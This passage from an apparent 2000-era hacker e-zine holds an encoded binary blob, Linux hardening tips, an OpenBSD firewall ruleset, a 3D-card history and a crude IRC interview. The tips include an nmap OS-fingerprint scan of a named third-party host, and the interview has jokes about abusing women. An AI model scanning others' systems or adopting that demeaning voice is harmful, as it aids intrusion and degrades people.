MHE02-T1*J#0LMEXN112*'79XJUSB4=J\\GZC,JWTSOD@.F-X68HHP2@+A"1\\R MBC3D@YH;B;OH:Y2++<2,"CDP^ICJR];>G11)6HA<>D'S8)\\?$[?TE)4*Q81E MCCVY\\)*`B/"64A4B@.8*(P_VKG)O([P"E_OVPJ<6CC!9(, M4B9^NJ%=I,>T+'A?F,9QNL4*T?'30)Z1.89'1\\-C\\64@(;T4T\\73EU>3R>*7 MZ?6K!;2V@-9XSY=1XL$5AZM;+[IGM8@V\\G`UERHM@G1=Q>"J(<*FRO MW4,R6B5>?"A`G&KIH=WGK%QEE&W_B'E1AJ'U$"\\NX!/U8^RNS#)_-9G-1'>X MC)*A6G>9*%GQIK(S&SB1[PMX0V)C8!NI-3L>P@"!PG&=JNB]8)V7,7F'O)/D MVVFY6M.9'*SX:Z*QX3!GST:XUIY"41V*Q>7%?/J/Q>75].)J>OUV,7_V:O+\\ M9C9]_5*8G6W^#GA[?D$!+;9>PNQYT.'N#TDA(0ASZ#0BH)3X646.4M"A\\R.> M$N.TWE.-)_#_E4QD[L7`!8\\(+!&,42"]/M"A'1-+B5"@$U"1'+A:NDK;SR\\6 M8&WQ]/73V=M_3A97%_AR>77Q;#*?3^:5:-=K^-$ZC0-QY^61MXRE8I!",&(E M+J4Z$PZL0OBT3+$LCMN/J^#.L9=%*PQR56(Z*MYEJ^ M47N-F?]V;_'-TQGRC8`',N:E6ZG(+:(TCXH=9P[#0NU]Y"G_(UO,D4L:IA6. MMX0:7+YWDU+60;*J,/H5F+,Z^G$ZFVDI&>*74@#!O8)5[B5-(YN814`0D:9^ M$1\\XQZDXH(0`#^\\;NV\\EY1SR>#AC"6]<10A8]GX?]'W)+!(Q'4T-DDH610RK MI]M$W$5>I;\\PRE4Q:)NJ%N*K$=O@&\\!#4A8:TUJ[C/%H$WX:-R/G\\[/R8/-\\ M^E)\\2UNC!`Z<4`;TH'R'LKIGG`9'3[\\1#K9>3ZY^TBKWCCJ=#O&;#[,T1CYF MY6C;VQMF%R\\7=`O1!QB3UGB;%IX!NN$LUY/YM;AX/7LK3@Q>ZSQLS,+%1@56 MD+OH,U0!7.EP0`"VPWY`"[L/OEE5'R19NFK!5]77OY'Y,H74)]J=`EEX46S* M#DMI*>F""O$"KHI0O?0"6EL"@VH6RT9FL%+TV..)AF7A@+DWDZL?+N83D_1# M!OM[JX*C+V6>PQ9=JI^"*$AZA2FZ;&5BRJZZ-HNKFNN22T1=+AU6@M9G;6G3 M*`6[N#@)HK"52JM<.A5;B@+B)9=:`X%.K"3UO;GUAYL7L\\EK<3IZ_#4K0J4` MU6>/'A$FW%&Z2!,%NG%T6RD/A_$,P1R1>G/XZ+DX'3?60B]6M#@:'U$50RJD MY66:QN,VV\\SZ"X,\\2AQ_]`^L0<^YO1O'X6B.?@X:ILR0N<-L\\OV+%],7%WT!ZJXX/Q2R*/-$:Q;?/X`3LT0&&,,G\\."H`TZ2(G2Z$Z)V)E@!S6HGM*HF=Z32 MR+M#H%'Z'KQ+^*KV3<;7J];V^M8J5#(&M!`*Q*E"^% M3GY<]@$0"[GI@X].V:HJ;=N@RS=X(M&J%`W>SL2#@$6F#U!BG[3`"^Z8882= M@O5$%A]I@X/&[Y00*=1AE3XR60\\`K?LYH#\\2*!.P:/R'/$']2%I@#!M)2B9,3.D\\;HTVYJ:L(S>,G[V"I M-%V2:DD2L:L8-V[[W[SA>7`S0+:XSG?TU21;RGO`P,&@\\CZFR@]/'H]:$6)# MA)[JO?8Z+DVJ&WY9HT2XI5X6RM-F96^G-):728+K*7GMMM[N^^K6CGP?%$.]/Y;,DYAR9VJ;GERF3/_N'Y^>N;V4Q;.#3*0T,*Q>(^DC1.'/=,3"Y> MB#!/-^)6[I:IEP<#S4>MI`^=&H#"<5M;1(/49!YK!5+7G+B\\\\RZ-D)/*(J6$ MYNN]SZ=7XAC]YM@"LVX^Q3%^U(ND>:&6E9HS%$L-U9><$?"3];-=IP*EG;+C M!"XA'):+Z#@NUTN=RK0@$,8IZ(=$*J&VEN&A,#ZT*#/J-\\8:Z,P:=R#GW(@X MI%K7>D!6?=)V7]"5^VYB'OF;@*Q7/V6$L6V5KOBHWEW%=2UD*B220*<_/:]2 MR/I)H/IVH4@++V8^48_+#;%%7Q;UD8)[IS&0+TC+)5V!4M6(F2U*?32#`/8# M;3?/H6QR!5@+:D@S0EN$Z)!H=RO_YH?G@O732G9FOW:N*I:IG++EG*FK=`?' M5`6409$2OH]_$ M$]$;]5SQUU]B_\\EWHO=MSW6)!KRK0./I%FN]L?FN+9+*-AF:=B+1PVV.W%_GE,-Z;L\\L/SH77S,LJ]LH$UU7S$57.-$` MO1"*;WC)6BK`--4Y1%IR=M4-+1NM6%-WZ"D33-R$;C*!&*31`+4>D#^G\\4`B ML(5Z2&Z?B4.:C:1;;5NEPS;C0J_3?1"(YM^N62U%\\V_W_KUV4>\\+NGVL/"2V MX-8?_^^S-UGL?6C!]S^B9Y!:N^!>?B!DO[!8T$4F>CU!M4F/36L"PA%!817M0D^S9EK)3RI:E[%3RLRQE MKJOM5$M/CQP]=G&UP-4,\\R,"\\P'W4,C&C3:]7>KKJ`P2SKON`_4..0+=&K_- MBP+=8Z\\]F@&B-C.C8!ZTZ?=/MGYBQO:CH6QQBU*WJB"J&2GSHF>B#JW=S"=7 M?]$'_=(5(?Q_9M`4'<16PS<,UV9&V2B:#0=\\`3Z[X^I%`3H@^+)YF]NR:74T M:QS-FD?MVXU@[X"&\\?J0_JX/ZAJ][EWV3JJ]DZJJW068_^LO+WY MUJ=UA]E0G]_+`A4=/FDZH18!SAXT.3!LE"TRA>%&M-DQ\\WT^J]\\RZ7?S>ZKC M_"3:.CA(799X\\QV5IO\\)TA3M(#H8A9HLOC;'7P0LG#GJ+L',]#9>E/`DS\\M7 M?E]/-8Z/\\>6.._.ZF[4#U_$]X4,IC(*'SJ%EZ/.CR^ES_8'"R1VS,U>.K7LO M`+DL:;(DOK`UNAWJI,D)5>=#54(3D#BOQC>MWQ"H2MP&DO`O#J@U@3G_4@)- M+:T[5QALSGTXJN&H(G&%`_I-@X%KE*5#8'%CD,H15<\\5;/_9'I".JEF9:=M. MVQ*>#L3DO?1+E+O\\:GOIJ;7&#*83[$WFU+ZHC^OS=IYBY=QZA6]^R4+#44Z3 M:93'I);ZK3$/(>DW+-Q]ZE\\-Q"Q-LWM(Z[I=YZ@V-9-;TE+%NP."/P_$SV54 MM`W7J'%H<*2+&NC`7SL9'*G*6?2VI'?:.]-)@PLW9,=;1V<5/2&K.SW!*332 MQ4,CC1T8Z%2CEC*#T4T:2+N5>VBH-\\X<_OV#OC#_Z8ZZE?+JI*=/F&QG\\ET] M.>/!E#25#=4?"``!*]$L/M]P:)OKN1)HI4J"!/H]#U%"Q[&1+XR22*UE+2#M MH%FMKDANB-^1889Y64+3M^-:IX^-3AL#N?%]^[XR^PX&$/>> suid.txt done echo "View suid.txt for a list of services running as root" echo "If you decide you don't need the file as root, use the following:" echo "chmod o-x ; chgrp wheel " : : As I've mentioned in the Inet Daemons section, if you don't know what : a program does, look it up. : : # Recommended Home Setup : A) Make sure to choose the right operating system for you. I run : Slackware 7.1. My next favourite Linux distribution is Debian 2.2. : : B) Firewall your box. If you're a console user, have a RO TTY designated : for your messages log to be piped to. If you are an X hippie (like : me), have a Virtual Desktop with you're log filtering program on it. I : have Gnomes System Log utility running all the time, and checkup on it : often. Also, 'man syslogd.conf', and see how you'd like syslogd setup. : : C) As I stated earlier, shutdown all of the INET daemons you can. If : you rarely give SSH access to users, then activate it manually instead : of having it running all the time. My personal preference is to have SSH : installed, but have it disabled. If anybody requires access to my system : I simply enable SSH and setup the TCP wrappers to only accept connections : from their IP. (Writing a quick bash script to automate this process is : a nice idea). : : SMTP, like I said earlier again, who needs it? You're a home user. Simply : use a remote SMTP server from your ISP. : : Like alot of us, we are interested in Web development. Thus we need an : httpd running. I use Apache + MySQL + PHP. : : So that's it. What does you're average home user required enabled to the : outside world? Nothing. Unless of course you are a Web developer as I : mentioned in the above paragraph. In this case you would require httpd : and SQL running. No big deal. : : D) Go through all of those system processes in suid.txt and change the : permissions and the group of the file. : : E) Patch your daemons and system services. Go to securityfocus.com, look : for patches for the daemons you are running. Also checkout your OS's : website. (eg. www.redhat.com or www.openbsd.org) for updated kernels, etc. : : F) Try running OpenBSD as a gateway machine. George (aphex) has written : a text on how to setup an OpenBSD gateway in this infosurge issue (8). : : # Extra Ideas : : A) Conceal what OS you are running: The primary way a cracker will : initiate to break your systems security is by running some Portscans. : Usually they will use something like nmap -O xxx.xxx.xxx.xxx. The -O : being an OS Fingerprint (which bases it's results on characteristics : of the TCP/IP stack). Knowing what operating system is running on a : targeted machine is more than likely the most valuable piece of : information if you are planning to gain access to a system. Mainly : because he/she can edit an exploits' shellcode depending on the remote : operating system. : : It's possible to detect these Nmap scans using, since, for example, : they'll often send packets set with odd combinations of TCP flags not : often seen "in the wild". Depending on how the operating system : responds, it is more often than not able to make an educated guess : about what operating system is running. On Windows, BlackICE (a decent : home firewall) has a feature to detect Nmap Fingerprints. Under Unix, : Portsentry (mentioned above) and Snort (also mentioned above) readily : detect most scans. : : As I was saying, quite some time ago Rendrag introduced me to a linux : kernel patch which basically changes the way the OS replies to these TCP : flags. Damien has this "stealth patch" built into his Linux kernel, : running underneath Debian 2.2. It mainly blocks TCP RST packets, which : slows down the scan and makes the ports timeout while waiting to : receive a response. This way it makes -O particularly unreliable. : : The example of this: (Please don't nmap his box) : : # nmap -O vorlon.rendrag.net : Starting nmap V. 2.54BETA7 (www.insecure.org/nmap/ ) : : /* Lets just skip the open ports */ : : No OS matches for host (If you know what OS is running on it, see : http://www.insecure.org/cgi-bin/nmap-submit.cgi). : : Dogcow from Wiretapped.net/2600.org.au has these files available at: : http://the.wiretapped.net/security/operating-systems/stealth-kernel-patches/ : : Another thing to try is to change the /etc/issue and /etc/issue.net files. : These files basically have a banner for telnet (and when you initiate : a new TTY), and by default has the operating system, kernel version, : etc. So change this, or set it blank -- whatever! I like the program : linux_logo, which makes a nice banner for your issue files. You can get : it to show additional information, or no information at all about your : system details. (Redhat users -- /etc/rc.d/rc.local and uncomment the : lines which write over these files). Linux_Logo is available at linuxberg : and also freshmeat. : : B) Write shell scripts to help you complete tasks: Writing your own : scripts can help you do complex tasks quickly. The way I set them : up is defining aliases to point to shell scripts. For example: alias : killuser="/home/lymco/bash-files/killuser.sh", would be in my bash init : file, (.bashrc or whatever you prefer). Not only does this method provide : you with an automated process, it saves you time++. : : C) Subscribe to Mailing Lists A good proportion of my learnings have been : gathered from mailing lists. They can introduce you to new computer : aspects which you might of never thought of. You can get questions : answered, or like me.. lurk in the background and learn from the posts. : : I recommend visiting securityfocus.com and/or insecure.org, checkout the : mailing lists available. May I further note, it might be an idea to read : through some recent archives of the mailing lists, just to make sure it's : the right one for you. I'm signed up with several mailing lists, including : 2600-AU, Bugtraq, Vuln-Dev, IDS, and Linux Kernel Security. All have been : great, and have kept me "on the ball" with security issues on the internet. : : D) Learn from your own computer A good way to update your security is : to try to crack it locally. That is, log on as a standard user and try : to crack root. Not only do you update your learning of vulnerabilities, : but also test your System Admin skills. Once you think it's _secure_ : ask a friend on IRC (one with skillz), to break your systems security. If : he/she does, ask how they did it, and learn from them. : : E) Learn C I have not met a _GOOD_ "hacker" who is not a C guru. By knowing : C inside out and back to front you understand how computers _really_ : work. You can look at some source code and say, "wait a minute that : strcpy() function is looking a bit dodgy.", or what have you. Learn C, : learn Assembly, learn how to code. It will get you a long way. : : F) The right Operating System No matter what people say, I still : believe Redhat can be a secure server if it is in the hands of a good : Admin. Debian is a good option as well. None the less OpenBSD > *, in : regards to security. Even if you are a home user, it may be an idea to : throw OBSD on a cheap box as your gateway. : : For a Linux workstation, tryout Debian 2.2 or Slackware 7.1. : : # Links : http://infosurge.rendrag.net : http://www.wiretapped.net : http://www.2600.org.au : http://www.freshmeat.net : http://www.linuxberg.com : http://www.securityfocus.com : : Hopefully the above information taught you something. It wasn't intended : to be too full on, by the way. If you have any comments or questions, : e-mail me at lym@thepentagon.com. : : "Over and out!", : : -- lymco http://dev.spanner.net : :.... : ...[ ]........................................................................ : : : #07 Example configuration of an OpenBSD firewall - aphex : : ---------------------------------------------- : :.[_]........................................................................: : ...: : : ->> intro : The rules I use are rather slack, but more secure then 70%+ of the : hosts out there. All this will work on the default install of openbsd : 2.6 -> current. But if your machine is rather busy, you really should : recompile the kernel with 'option NMBCLUSTERS=8192' otherwise you'll get : errors like 'mb_map full' or the system might just hang. Other then that, : there is no need to recompile your kernel to get this to work, GENERIC is : fine. It is mainly designed you users with small home networks or small : businesses, with dialup users in mind (sorry k, ikari). : : ->> ip forwarding : IP Forwarding needs to be turned on. You can do this using sysctl, by : typing 'sysctl -w net.inet.ip.forwarding=1' OR you can edit the file : /etc/sysctl.conf by adding: : : net.inet.ip.forwarding=1 : : ->> ipfilter, ipnat and ipmon ipf (ipfilter) : ipfilter does just what its name suggests, it is a packet filter. To : turn it on, simply: : : ipf -Fa -f /etc/ipf.rules -E : : This will flush the ruleset and enable the service. You should add : 'ipfilter=YES' to rc.conf, to be started at boot. More on /etc/ipf.rules : later. ipnat performs NAT. to turn it on: : : ipnat -CF -f /etc/ipnat.rules : : Which will also flush, and enable the service using the rules in : /etc/ipnat.rules. Also add 'ipnat=YES' to rc.conf. Again, more on this : later. And just for debugging preposes enable ipmon with: : : ipmon -Ds : : ->> /etc/ipf.rules : The main advantage that ipf has over ipchains is the simplicity of the : rules. Even if you know nothing about ipf, you can have a look at a : large ruleset and half-understand it, of course at least half a brain : is required. Heres an example: : : pass out from any to any : pass in from any to any : : Now, not to state the obvious, but this roughly means 'allow any : connection from any interface out through any other interface'. And : 'allow in any connection on any interface into the machine'. You see : this don't you? Well thats all there is to ipf. The rest is just options, : changed and added lines to this default configuration. Well I lie, there : really is quite alot of complex options and abit of skill required for : hardcore configurations. But most of the people reading this don't have : national security clearance or windows 2002 source code to protect, Yes : I know you have ohday pron, but that doesn't count. Coming up is a : decently secure configuration. Its fairly stock and has nothing too : fancy, but it has some good examples in it: : : (Ed Note: "#" is used here as a comment in a configuration file rather : than a command to be typed at a root prompt, as in other areas of IS 8) : # For reference: # ne3 = ethernet to internal network # tun0 = ppp interface to internet # 192.168.0.* = internal network. # IP filtering rules. # loopback rules pass out quick on lo0 pass in quick on lo0 # block tiny fragments block in log quick proto tcp all with short # drop source routed packets block in log quick on tun0 all with opt lsrr block in log quick on tun0 all with opt ssrr # dont allow anyone to spoof non-routable addresses block in quick on tun0 from 0.0.0.0/32 to any block in quick on tun0 from 127.0.0.0/8 to any block in quick on tun0 from 192.168.0.0/16 to any block in quick on tun0 from 172.16.0.0/12 to any block in quick on tun0 from 10.0.0.0/8 to any block out quick on tun0 from any to 127.0.0.1/8 block out quick on tun0 from any to 192.168.0.0/16 block out quick on tun0 from any to 174.16.0.0/12 block out quick on tun0 from any to 10.0.0.0/8 # allow certain classes of ICMP pass in quick on tun0 proto icmp all icmp-type 0 pass in quick on tun0 proto icmp all icmp-type 3 pass in quick on tun0 proto icmp all icmp-type 11 # allow all access from internal interface pass in quick on ne3 192.168.0.0/16 to any # allow outside access to http, ssh and mail pass in quick on tun0 from any to an port = 80 flags S/SA pass in quick on tun0 from any to any port = 22 flags S/SA pass in quick on tun0 from any to any port = 25 flags S/SA # allow DNS from my optus nameservers pass in on tun0 proto udp from 203.2.75.2 port = 53 to any pass in on tun0 proto udp from 203.2.75.12 port = 53 to any # let outgoing traffic out pass out quick on tun0 proto tcp from any to any flags S keep state pass out quick on tun0 proto udp from any to any keep state pass out quick on tun0 proto icmp from any to any keep state # block all by default block in log quick on tun0 any to any # end ruleset : : If any packet doesn't fit into one of these rules, then it is dumped : and logged. There are rules to politely reject connections etc, but : dont bother. The 'log' option is handy for those why are paranoid out : there. As you can see you can tell ipf alot of information. Which port, : what protocol, what adress, etc.. Once thats all added to /etc/ipf.rules, : restart ipf. You can check if your rules are inplace by typing: : : ipfstat -io : : Which will display the current active rules. : : ->> /etc/ipnat.rules : This file is alot smaller then ipf.rules, merely because there is not : much to configure. : # Reference: # tun0 = ppp interface to internet # 0/32 = if your ip is dynamic, otherwise put your ip here. # 192.168.0.* = internal network # ipnat ruleset # port map map tun0 192.168.0.0/24 -> 0/32 portmap tcp/udp 1025><65000 # handle ICMP, etc. map tun0 192.168.0.0/24 -> 0/32 # This will make ipnat act as a proxy for active FTP sessions map tun0 192.168.0.0/24 -> 0/32 proxy port ftp ftp/tcp # end ruleset : : Here you see only 3 lines, one to map ports, one to handle all other : things, and one for a transperent ftp proxy. I should also mention : that if you want to redirect connection attempts because, for example, : you host your small website off a server machine on your internal : network add a derivative of the following line into /etc/ipnat.rules: : : rdr tun0 192.168.0.1 port 80 -> 192.168.1.2 port 8080 : : Where 192.168.0.1 is the firewall, and 192.168.0.2 is the webserver. : This will map port 80 on the external (tun0) interface on your : firewall to port 8080 on the server located on your network at : 192.168.1.2. The last thing that needs to be done is to run 'ipf -y' : everytime you get allocated a new ip address. You can do this manualy : OR by adding 'bg ipf -y' to your /etc/ppp/ppp.conf script /inside/ your : settings for your ISP. : : ->> outro : Thats all the basics you'll need to know. If you really want to protect : your data go with the most secure setup.. unplug the computer from any : network. Even z3r0c00l can't transmit packets over thin air. For the : average user, this sort of setup will be good enough. : : -aphex -http://pulsewidth.net : :.... : ...[ ]........................................................................ : : : #08 History of 3d acceleration - Maticles : : ---------------------------- : :.[_]........................................................................: : ...: : : Introduction : : 'llo - 'tis I Mat(icles if you prefer) - I used to common on #infosurge, : but got bored, and now Damien has me looked up in his closet treating : me like a monkey and has me writing a 'History of 3d acceleration' : review. Woohoo. 3d cards primarily surfaced late 1995 with the advent : of 3dfx's Voodoo. I must admit, professinal machines such as the Silicon : Graphics Onyx did have 3d acceleration, but you'd be paying $15000 US : for the privledge of owning such a card. : : About the first 3d comsumer accelerator - 3Dfx's 'Voodoo Graphics Chip' : : The first 3d accelerator came from the Silicon Valley start up company, : 3Dfx Interactive, who developed the Voodoo based chip. The Voodoo : generally had a hand blistering 4mb of onboard memory (Compared to 32mb : and 64mb of todays standards) and had features such as accelerated MIP : mapping and alpha transparencies. I bought such the beast in 1996 (or : maybe it was 1997, I forget) for a whopping $210 which was expensive for : a video card in those days, it was a yum-cha Atrend Helios. It allowed : whooping detail on games such as Need For Speed 2:SE and GLQuake, both : of which looked so err.. 'life like' it was scary. There were 'cool' : things such as alpha-blended fog, fancy-dan textures and the whole thing : just looked so schmick over its 2d variant. : : How the whole thing turned into a race. : : nVidia had just surfaced with its Riva 128, Rendition with its PowerVR, : Matrox with the Mystique and a few other non-starters. This gave : serious competition in the DirectX segment, but with 3Dfx Interactive : holding the rights to glide, these chips didn't hold much of a chance, : until Microsoft. Microsoft got its act together and released Direct3d, : which was easier to code then glide, and it would run on alot more : systems, seeing as all of the 3d accelerators were Direct3d compliant. : THis got developers interested, so they started to code in Direct3d. (Some : were cunning enough to do Direct3d and glide - glide was ALOT faster on : voodoo then Direct3d on the voodoo) Things were going well for nVidia, : Rendition and Matrox with their cards, finding a nice little place in : the market. Then 3Dfx made a return. : : 3Dfx's next plan. : : 3Dfx released the Voodoo2 chipset, which was capable in running in SLI. A : little more on SLI later. The power of 2 'Voodoo 2' was simply awesome to : put it in 2 words. The frame rate was a astonishing 40fps at 640x480 in : games such as Foresaken or Turok, this was simply unheard of in the past. : Others chipset makers (nVidia, Matrox and newcomers to the 3D market, S3 : and ATi) created new cards also, but after 3Dfx has made a nice profit. : Unfortunately Rendition basically stalled at the starting line, and failed : to bring out a 3rd revision of PowerVR (2nd being PowerVR PCX2). S3 had : just started with the Savage 3d and the Virge series. Virge really : sucked in 3d, as did Savage 3d, so we won't speak about them much, : as they weren't particully ground-breaking products. ATi released the : rage which ended up being a massive success in OEM's and laptops because : of their cheapness, and they were alright for 3d applications. All these : cards on the markets from various companies started a 3d accelerator war, : which meant new features came in place. Bit more after this... : : SLI : : SLI was 3Dfx's main feature in the Voodoo 2's. SLI means Scan Line : Interleave which basically is 1 'Voodoo 2' card is doing 1 line, which : the other is doing the line under, as such: : : ----^^^^^^-- <-- 'Voodoo 2' card number 1 : ----.----.-- <-- 'Voodoo 2' card number 2 : ------->---- <-- 'Voodoo 2' card number 1 : ------------ <-- 'Voodoo 2' card number 2 : ----\\____/-- <-- 'Voodoo 2' card number 1 : : And so forth. This allowed the speed to be basically doubled. : : The after effects of the first 3D war. : : After this came nVidias TNT and TNT2, Matrox's G200 and 3Dfx's Voodoo3 as : the major contenders. The Voodoo3 this time was alot worse then the TNT : and TNT2 because it was being held back by 16-bit. Bad 3Dfx. Bad. 16-bit : sucks, it looks washed out and grainy, believe me, get a TNT/2 or Geforce : offering and see, much yumness in 32-bit indeed. This section is rather : boring as its much the same as the first war, so I'll get to todays : technologies. : : What yummy goodness we have today : : 3Dfx is dead. Yes, nVidia own them now, goto www.3dfx.com if you must. : The Voodoo4/5 was released way after schedule, therefore it just didn't : work. Geforce 2 Ultra are now out, although expensive. For the same : price as a Voodoo5 you can get the Geforce2 Pro, which looks better in : my opinion and has faster FPS. Shh you Voodoo people, noone cares about : 'Full-Screen Anti-Aliasing' the Geforce 2 series (Not MX thou) can do : it easily with a frame loss, but not enough for it to be jerky. Anyway, : Voodoo 5 have the SLI technology also, with the Voodoo 5 board (Now being : manufactured by 3Dfx's arm, STB [or something]), but even with this, : it doesn't beat the Geforce 2. The Voodoo 4, meant to be in competition : with the Geforce 2 MX, looks better competing ith a TNT 2 Ultra, it just : can't keep up with the Geforce 2 MX. Whats so special about this Geforce : I hear you ask? Well, the Geforce is so special because it has a GPU, : Graphics Processing Unit, therefore the CPU doesn't have to do transform : and lighting effects, this meants the CPU has more time for AI and other : features. The Voodoo 5 doesn't have a GPU, .: it sucks. :) : : I'll name the variants on the Geforce series: (In order of release) Geforce : 256 - nVidias first Geforce, sold alot. Geforce DDR - A Geforce 256, : but has DDR (Double Data Rate) so it operates twice per ram clock-cycle. : Geforce 2 GTS - Geforce 256, but with 4 pipelines for textures, DDR ram, : fast core, it just means more yummyness! - oh, it also has the nVidia : Shader Rasterizer which means shadows look even more shadowy! Woohoo! : Geforce 2 MX - The 'home office' version of the Geforce 2 GTS, has slower : SDRAM, but is still 33% faster then the Geforce 256. Geforce 2 Ultra - : Man. This one rocks. The speed is simply awesome, 1600x1200, ABSOLUTLY : everything high in Quake 3 with 4x FSAA, and its still not jerky. It : rocks, trust me. Geforce 2 Pro - A Geforce 2 GTS, but with faster RAM. : Geforce 2 Go! - The Geforce 2 GTS, but with some nifty power saving stuff : so it can run in laptops without draining the battery in 0.39 seconds. : : ATi has made a comeback with the Radeon, which apparently (never seen one : going) looks as good as a Geforce 2 and slightly slower, but still has : better drivers etc. But still, I'm yet to see one actully going. I'll : update this in Infosurge 9. : : Whats to come. : : Well, with 3Dfx gone, its up to nVidia and ATi. S3 are gone, they're now : Sonic Blue, who do other - non-interesting stuff. Rendition are gone in my : opinion. So, nVidia and ATi, lets have a look. nVidia is releasing the : 'NV20' (only a codename) which is spectilated to be 7 times faster then : the Geforce 2 Ultra, I don't believe it, and think its just a rumour, : plus, its also rumoured to cost AU$1400, but nothing official is available : on it. ATi is also making the Radeon 2 (spectilation again) with a core : twice as fast as the current one. I'll post up what I heard in Infosurge 9. : : Oooh, Damien has brought me dinner, is that light? Yes! I see daylight, : but it hurts my pail closet skin. : : Ta ta Folks, until next time. : :.... : ...[ ]........................................................................ : : : #?? Interview with a vampi..... uhhh, irc loser - Fleabag : : --------------------------------------------- : :.[_]........................................................................: : ...: : : Evening phase5, thank you for taking time out of your busy : lifestyle of drinking alone and masturbating to let me interview you. : im not taking time out : im doing both those things : as we speak : Shall we get this baby rocking? Lets... : : How did you get into phreaking? : umm : when i was a kid : possibly as soon as i was born : my family bought : or had previously owned a phone : it grew from their i guess : : Have you ever had a homosexual experience? : i thought we weren't going to go into this : i dont give permission for my face to be on camera : i want it blurred : blurred : ! : : Have you ever patted a monkey? : yes : often : I like monkeys. : i like my monkey : tho sometimes i have to beat it : more and more often i have to beat my monkey : : Whats your favourite band? : hmm... band : that's a tough question : Just answer it. : i really like that royal crown revue band : they make good music : whenever im down i can listen to it : and laugh my arse off at their shitness : so the answer is red hot chili peppers : : Are you single? Uhhh, you don't have to bother answering that : one.... : moving on... : : Do you think the au phreaking scene is dead? : in a way : there isn't really much new innovation : im just in it for the groupie chicks : Aren't we all? : as you can tell, its working : : Favorite zine? (Besides infosurge?) : umm : let me think for a bit : actually, i have to go for a piss : back in a few : Okay, I'm going to get another beer. : Damn phase, does it always take you that long to piss? : (Seriously, its been over 10 minutes) : Maybe you should see a doctor? : stfu : umm.. no favourite really : used to like um : phrack, thtj, fk : and the exploit-x issue 1 : was krad : So I heard... : and what do you mean 'other than infosurge'? : i wouldnt say that trash is my favourite : I'm asking the questions here. : : If you could be any member of the infosurge crew, who would you : be? : that phase5 guy : he's cool : other than that : i'd be k : he puts the k in krad : We all want to be k. : : Current hardware setup? : umm hardware : this computer : the other one next to it : the 2 386's i hide alcohol in : the p166 i hide alcohol in : umm : the 386 is called woody : and it has a can of woodstock in it : thats irony : or something similar to that : got a dumb terminal as well : and a phone shaped like a football : : Who do you think I should interview next? And why? : not lymco : he's from perth : all his answers will be : 'yes i want to fuck my relatives' : and : 'no.. no electricity yet' : Whos the most interesting person you've ever met online? : and 'fuck cant talk now. uncle jed needs me to backhoe the lawn : herm : slow down : with the questions : stfu : i like to rant : I'll do what I want, and I'll fix it up all neat and shit. : Rant away. : ok : pants : why are they so important : i dont wear them most of the time : someone explain : Are you quite done? : for now : : Whos the most interesting person you've ever met online? : umm, most interesting person : i dont know : your kind of a weirdo : could be you : coolest person i met online : doesnt irc tho : so that probably doesnt count : I asked for a name. Not your life story. : i'll come back to it later : Okay.. : : If you could be any type of smell, what would you be and why? : umm : you know the smell of nutsaq? : not that : something to pickup chicks : so the smell of a stollie : : Favorite site? : its a porn site : so i'll give you second favourite : i dont want everyone using its bandwidth : oh shit, phone beeped : wait up : wtf : thesefucks : are messaging me : calling me "jen" : and saying we had a great night last night : this is the second time : in a week : this has happened : this is fucked : Do you really think the people reading IS care? : thats not the fucking point : Just answer my questions and crawl back into your hole. : what was the question again? : oh : www.theonion.com : : If you could be a chick for one day, whats the first thing you : would do? : are you stealing questions : from picturepoll.com : thats fucking sad : what kind of bullshit interview is this : No. I am not. : Answer the fucking question. : if i was a chick for a day : i'd marry myself : so the next day : i'd have achick : to cook, clean and take my agression : : Do you think I'm fat? : in those pants? yes : : Thoughts on Project K? : project k demands bananas : : Have you ever spoken to the devil? : no : he once felt me up on the bus tho : but i ignored him : : Ever woken up screaming 'Oh god, what happened to my penis?!!'? : yes : several times : : Know where I can get some 0day pr0n action? : www.thehun.net : has 0hday : i have others : but i dont give out my secrets : phase5 thanks for you time, I'll ask you one more question... : ok : : I haven't got anywhere to stay tonight, reckon I could crash at : your place? : im sleeping at the park tonight. you're welcome to join me : Thank you phase5. Your thoughts will forever live on in : infosurge8....... you fucking sad little weirdo... : guess what : What? : im removing your midget monkey article from is7 : you fuck : I hate you. : eric? : is that you? : Pablo? : yes : its me : One more thing zak.... : yes? : i'll come back to it later : The people deserve to know. : what was the question? : Whos the most interesting person you've ever met online? : there's no-one really : that stands out as really interesting : not on irc anyway : You said you come back to it, the coolest person. : coolest? : me : Stop being a tight fuck, its your fucking zine, name names. : OK FUCK : LOOK : NO ONE IS FUCKING INTERESTING : YOUR NOT COOL : YOUR SAD FUCKS WITH NO LIVES : i have met one krad person on icq tho : Who was? : and here ends interview : Shit, you really are an alco huh? Please note, phase is hanging to : get to the park to drink alone. : fucking yes : its 12:00 : i want to go : spend time with jim : my friend : leave me alone : blur my fucking face : blur it : : -In conclusion- : : phase5 is a creepy little man. Hes the type of person if you saw walking : towards you on the street, you'd cross the road to avoid him. His past times : include, drinking alone in parks, abusing women and masturbating over old : #phreak logs. He has a habit of asking people for money and soiled panties. : Once upon a time, there was a guy who went well at school, knew the secrets : of au phreaking, now stands a dirty pervert who spends whatever money he : makes on alcohol. On the Fleabag Human Rating System (TM) I give phase5 : 3/10. All three points are for jokes made about lymcos mother that I : found somewhat amusing. : : Fleabag. 8/12/00 : :..................................................... : : [ ] e o f